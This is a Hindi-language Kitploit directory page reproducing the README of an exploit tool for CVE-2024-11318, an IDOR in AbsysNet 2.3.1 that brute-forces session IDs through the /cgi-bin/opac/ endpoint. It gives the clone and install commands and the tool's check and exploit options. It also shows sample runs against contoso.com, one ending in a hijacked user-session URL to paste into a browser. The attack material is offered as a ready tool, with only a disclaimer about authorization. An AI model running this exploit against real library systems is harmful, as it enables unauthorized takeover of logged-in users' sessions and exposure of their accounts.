Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-11318 — यह रिपॉजिटरी AbsysNet 2.3.1 में एक IDOR भेद्यता का विवरण देता है, जो एक दूरस्थ हमलावर को /cgi-bin/ocap/ एंडपॉइंट के माध्यम से सत्र आईडी को ब्रूट-फोर्स करने की अनुमति देता है। सफल शोषण सक्रिय उपयोगकर्ता सत्रों से समझौता कर सकता है, HTML में प्रमाणीकरण टोकन उजागर कर सकता है। हमला सक्रिय सत्रों तक सीमित है और यदि उपयोगकर्ता लॉग आउट करता है तो समाप्त हो जाता है। | Kitploit
उपकरण/GitHubGitHub/xthalach/cve-2024-11318
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubxthalach/cve-2024-11318

CVE-2024-11318

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

रिपॉजिटरी देखें
वेबसाइट
1721 साल पहलेअभी तक समीक्षित नहीं

यह रिपॉजिटरी AbsysNet 2.3.1 में एक IDOR भेद्यता का विवरण देता है, जो एक दूरस्थ हमलावर को /cgi-bin/ocap/ एंडपॉइंट के माध्यम से सत्र आईडी को ब्रूट-फोर्स करने की अनुमति देता है। सफल शोषण सक्रिय उपयोगकर्ता सत्रों से समझौता कर सकता है, HTML में प्रमाणीकरण टोकन उजागर कर सकता है। हमला सक्रिय सत्रों तक सीमित है और यदि उपयोगकर्ता लॉग आउट करता है तो समाप्त हो जाता है।

साझा करें

CVE-2024-11318 (IDOR - AbsysNet 2.3.1 उपयोगकर्ता हाईजैकिंग)


अस्वीकरण

यह उपकरण यह पहचानने और शोषण करने में मदद करने के लिए डिज़ाइन किया गया है कि क्या कोई एप्लिकेशन इस विशिष्ट CVE-2024-11318 के लिए संवेदनशील है। इसका उद्देश्य साइबर सुरक्षा पेशेवरों, शोधकर्ताओं और पैठ परीक्षकों द्वारा उन वातावरणों में सुरक्षा का आकलन करना है जहाँ उनके पास स्पष्ट प्राधिकरण है।

यदि भेद्यता की पुष्टि हो जाती है, तो शोषण केवल तभी किया जाना चाहिए यदि आपके पास एप्लिकेशन या सिस्टम स्वामी से उचित प्राधिकरण हो।

इस उपकरण का उन सिस्टमों या नेटवर्कों के खिलाफ अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है। लेखक इस उपकरण के दुरुपयोग या इससे होने वाली क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

इस उपकरण का उपयोग करके, आप सभी प्रासंगिक कानूनों और नैतिक मानकों का पालन करने के लिए सहमत हैं। परीक्षण करने या भेद्यताओं का शोषण करने से पहले हमेशा स्पष्ट अनुमति सुनिश्चित करें।


विवरण

यह भेद्यता AbsysNet संस्करण 2.3.1 को प्रभावित करती है और एक दूरस्थ हमलावर को एक सक्रिय उपयोगकर्ता के सत्र से समझौता करने की अनुमति देती है। हमले में /cgi-bin/ocap/ एंडपॉइंट में एक IDOR (असुरक्षित प्रत्यक्ष वस्तु संदर्भ) भेद्यता का शोषण करना शामिल है, जहाँ सत्र पहचानकर्ता बल-प्रयोग (brute-forcing) के लिए संवेदनशील है।

एक प्रमाणित उपयोगकर्ता से जुड़े सत्र आईडी का सफलतापूर्वक मिलान करने पर, प्रमाणीकरण टोकन HTML कोड में उजागर हो जाता है। हालाँकि, हमला केवल सक्रिय सत्रों तक सीमित है, और यदि प्रभावित उपयोगकर्ता लॉग आउट करता है, तो हमलावर की पहुँच तुरंत समाप्त हो जाती है, जिससे समझौते की स्थिरता सीमित हो जाती है।

इस भेद्यता से केवल उन उपयोगकर्ता सत्रों का अपहरण संभव है जो वर्तमान में लॉग इन हैं, और यदि वर्तमान उपयोगकर्ता लॉग ऑफ करता है तो हमलावर कनेक्शन खो देता है।


स्थापना

git clone https://github.com/xthalach/CVE-2024-11318.git
cd CVE-2024-11318
python3 -m venv cve-2024-11318
source cve-2024-11318/bin/activate
pip install -r requirements.txt
python3 cve-2024-11318.py

उपयोग

python3 cve-2024-11318.py 

                                                                                                                                                                      
    ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██╗██████╗  ██╗ █████╗ 
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║███║╚════██╗███║██╔══██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║ ██║██████╔╝ ██║╚█████╔╝
    ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═╝╚═════╝  ╚═╝ ╚════╝ 

    ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
    ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
    ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
    
usage: CVE-2024-11318.py [-h] -u URL [--check] [--exploit]

यह स्क्रिप्ट आपको यह आकलन करने की अनुमति देती है कि कोई वेबसाइट CVE-2024-11318 के लिए संवेदनशील है या नहीं। यदि पुष्टि होती है, तो यह भेद्यता का शोषण करने का विकल्प प्रदान करती है, लेकिन केवल उन परिस्थितियों में जहाँ आपके पास ऐसा करने का स्पष्ट प्राधिकरण हो।

options:
  -h, --help         यह सहायता संदेश दिखाएँ और बाहर निकलें
  -u URL, --url URL  लक्ष्य URL
  --check            इस स्क्रिप्ट में यह विकल्प आपको यह परीक्षण करने की अनुमति देता है कि कोई वेबसाइट CVE-2024-11318 के लिए संवेदनशील है या नहीं।
  --exploit          इस स्क्रिप्ट में यह विकल्प आपको CVE-2024-11318 भेद्यता का शोषण करने में सक्षम बनाता है।

--जांच

  • संवेदनशील
└─$ python3 CVE-2024-11318.py -u 'https://www.contoso.com/cgi-bin/opac/O7375/ID009a7a6e?ACC=101' --check
                                                                                                                                                                      
    ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██╗██████╗  ██╗ █████╗ 
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║███║╚════██╗███║██╔══██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║ ██║██████╔╝ ██║╚█████╔╝
    ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═╝╚═════╝  ╚═╝ ╚════╝ 

    ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
    ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
    ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
    
[|] हमला शुरू: लक्ष्य संवेदनशील है या नहीं इसकी जाँच!
[*] URL जाँच रहा है: https://www.contoso.com/cgi-bin/opac/O7375/?ACC=101
[+] संवेदनशील: टोकन 'ID009a7a6e' HTML कोड में पाया गया है।

  • संवेदनशील नहीं
└─$ python3 CVE-2024-11318.py -u 'https://contoso.com/cgi-bin/abnetopac/O7fbxZNd3yjeqX7isbLYjGeEUqX?ACC=101' --check
                                                                                                                                                                      
    ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██╗██████╗  ██╗ █████╗ 
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║███║╚════██╗███║██╔══██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║ ██║██████╔╝ ██║╚█████╔╝
    ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═╝╚═════╝  ╚═╝ ╚════╝ 

    ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
    ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
    ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
    
[q] हमला शुरू: लक्ष्य संवेदनशील है या नहीं इसकी जाँच!
[←] URL जाँच रहा है: https://contoso.com/cgi-bin/abnetopac/O7fbxZNd3yjeqX7isbLYjGeEUqX?ACC=101
[-] संवेदनशील नहीं: एप्लिकेशन को पैच कर दिया गया है, टोकन मान "O7fbxZNd3yjeqX7isbLYjGeEUqX" मेल नहीं खाता।

--शोषण

└─$ python3 CVE-2024-11318.py -u 'https://www.contoso.com/cgi-bin/opac/O7067/ID5c22d860?ACC=101' --exploit
                                                                                                                                                                      
    ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██╗██████╗  ██╗ █████╗ 
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║███║╚════██╗███║██╔══██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║ ██║██████╔╝ ██║╚█████╔╝
    ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═╝╚═════╝  ╚═╝ ╚════╝ 

    ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
    ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
    ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
    
[█] हमला शुरू: लक्ष्य का शोषण!
[*] --- शोषण शुरू ---
[b] URL: https://www.contoso.com/cgi-bin/opac/O7099/?ACC=101
[+] उपयोगकर्ता टोकन हाईजैकिंग: https://www.contoso.com/cgi-bin/opac/O7054/ID9f842d80?ACC=101 (ब्राउज़र में कॉपी और पेस्ट करें)

टूल डाउनलोड करें